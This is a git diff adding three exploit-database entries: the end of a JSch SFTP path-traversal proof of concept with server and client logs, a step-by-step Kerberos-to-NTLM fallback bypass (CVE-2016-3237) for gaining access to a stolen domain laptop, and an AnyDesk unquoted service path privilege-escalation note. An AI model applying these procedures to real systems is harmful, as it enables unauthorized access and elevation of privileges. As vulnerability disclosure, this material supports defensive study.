+   `stat(/fancyfolder//..\\..\\totally_malicious_script)`   
+b) the sftp-server (PoC) returns file attributes for
+`totally_malicious_script` 
+   (with traversal)
+c) jsch sftp-client requests file `open` on the path (with traversal):
+   `open(/fancyfolder//..\..\totally_malicious_script)`
+d) jsch sftp-client builds destination path by concatenating the destination
+   folder ( `<path>\workspace-ee\jsch\.` ) with the server provided filename
+   `/..\..\totally_malicious_script` stripping any data before and including
+   `/` of the filename, then receives the remote files contents: `
+   <path>\workspace-ee\jsch\.\..\..\totally_malicious_script`
+e) the resulting sftp-client local destination path
+  `dst <path>\workspace-ee\jsch\.\..\..\totally_malicious_script` is outside
+   the basedir `<path>\workspace-ee\jsch\.`  
+
+sftp-server (PoC)  
+
+DEBUG:paramiko.transport.sftp:[chan 0] Request: stat INFO:__main__:STAT
+(u'/fancyfolder//..\\..\\totally_malicious_script')
+INFO:__main__:STAT - returning: totally_malicious_script
+INFO:__main__:** /..\..\totally_malicious_script
+DEBUG:paramiko.transport.sftp:[chan 0] Request: open
+INFO:__main__:OPEN: /fancyfolder//..\..\totally_malicious_script
+DEBUG:paramiko.transport.sftp:[chan 0] Request: read
+DEBUG:paramiko.transport.sftp:[chan 0] Request: read
+DEBUG:paramiko.transport.sftp:[chan 0] Request: read
+DEBUG:paramiko.transport.sftp:[chan 0] Request: close
+
+sftp-client (jsch)  
+
+dst <path>\workspace-ee\jsch\.\..\..\totally_malicious_script
+_get: /fancyfolder//..\..\totally_malicious_script,
+java.io.FileOutputStream@7ccf3329
+sftp> 
+
+6. downloaded file is stored in server controlled relative path on client
+
+tintin@testbox ~<path>/workspace-ee/jsch $ ls ../../total*
+../../totally_malicious_script
+
+Notes
+-----
+
+* the PoC is a slightly modified version `stub_sftp.py` shipped with
+  paramiko/tests [4].
+* we've seen ssh bots in the wild using jsch probing for weak ssh passwords.
+
+Vendor response: see [5]
+
+References
+----------
+
+[1] http://www.jcraft.com/jsch/
+[2] https://sourceforge.net/projects/jsch/files/?source=navbar
+[3] https://sourceforge.net/projects/jsch/files/jsch/0.1.53
+[4] https://github.com/paramiko/paramiko/blob/master/tests/stub_sftp.py
+[5] http://www.jcraft.com/jsch/ChangeLog
\ No newline at end of file
diff --git a/platforms/windows/local/40409.txt b/platforms/windows/local/40409.txt
new file mode 100755
index 000000000..08f7728c6
--- /dev/null
+++ b/platforms/windows/local/40409.txt
@@ -0,0 +1,38 @@
+# Exploit Title: Kerberos Security Feature Bypass Vulnerability (Kerberos to NTLM Fallback)
+# Date: 22-09-2016
+# Exploit Author: Nabeel Ahmed
+# Tested on: Windows 7 Professional (x32/x64) and Windows 10 x64
+# CVE : CVE-2016-3237
+# Category: Local Exploits & Privilege Escalation
+
+SPECIAL CONFIG: Standard Domain Member configuration with password caching enabled (default), BitLocker enabled without PIN or USB key.
+REPRODUCE:
+	Prerequisites:
+			- Standard Windows 7/10 Fully patched (up until 08/08/2016) and member of an existing domain.
+			- BitLocker enabled without PIN or USB key.
+			- Password Caching enabled
+			- Victim has cached credentials stored on the system from previous logon.
+
+This vulnerability has a similar attack path as MS15-122 and MS16-014 but bypasses the published remediation.
+
+STEP 1: Obtain physical access to a desktop or laptop with the above configuration.
+STEP 2: Boot system and determine FQDN of the device. (example. CLIENT.domain.local), this can be obtained by monitoring the network broadcast communication, which the system sends prior to loggin in. The username can be extracted from the loginscreen (E.g USER1)
+STEP 3: Create Active Directory for the domain you obtained in STEP 2 (domain.local).
+STEP 4: Create User with similar name as the previously logged in user. (E.g domain\USER1), and force user to change password upon next login.
+STEP 5: Login on the target machine and proceed to the change login screen.
+STEP 6: Disable the following (Inbound) Firewall Rules:
+	 - Kerberos Key Distribution Center - PCR (TCP and UDP)
+	 - Kerberos Key Distribution Center (TCP and UDP)
+STEP 7: Change the password. (Changing Password screen will appear to hang)
+STEP 8: Wait 1 minute before re-enabling the firewall rules defined in STEP 6
+STEP 9: Enable firewall rules again and after a few seconds the password should be successfully changed.
+STEP 10: Message "Your Password has been changed" is displayed, followed by the following error message "The trust relationship between this workstation and the primary domain failed."
+STEP 11: Disconnect Target system's network connection.
+STEP 12: Login with the new changed password.
+
+IMPACT: Access gained to the information stored to the target system without previous knowledge of password or any other information. This could also be used to elevate your privileges to local Administrator.
+
+Reference: Video PoC/Demo can be found here: https://www.youtube.com/watch?v=4vbmBrKRZGA
+Reference: Vulnerability discovered by Nabeel Ahmed (@NabeelAhmedBE) of Dimension Data (https://www.dimensiondata.com) 
+
+
diff --git a/platforms/windows/local/40410.txt b/platforms/windows/local/40410.txt
new file mode 100755
index 000000000..226b8bdd5
--- /dev/null
+++ b/platforms/windows/local/40410.txt
@@ -0,0 +1,42 @@
+# Exploit Title: AnyDesk 2.5.0 Unquoted Service Path Elevation of Privilege
+# Date: 22/09/2016
+# Exploit Author: Tulpa
+# Contact: tulpa@tulpa-security.com
+# Author website: www.tulpa-security.com
+# Vendor Homepage: http://anydesk.com
+# Software Link: http://anydesk.com/download
+# Version: Software Version 2.5.0
+# Tested on: Windows 10 Professional x64, Windows XP SP3 x86, Windows Server 2008 R2 x64
+# Shout-out to carbonated and ozzie_offsec
+
+1. Description:
+
+The Anydesk installs as a service with an unquoted service path running with SYSTEM privileges.
+This could potentially allow an authorized but non-privileged local
+user to execute arbitrary code with elevated privileges on the system.
+
+2. Proof
+
+C:\>sc qc anydesk
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: anydesk
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files\AnyDesk\AnyDesk.exe --service
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : AnyDesk Service
+        DEPENDENCIES       : RpcSs
+        SERVICE_START_NAME : LocalSystem
+
+
+3. Exploit:
+
+A successful attempt would require the local user to be able to insert their
+code in the system root path undetected by the OS or other security applications
+where it could potentially be executed during application startup or reboot.
+If successful, the local user's code would execute with the elevated privileges
+of the application.
+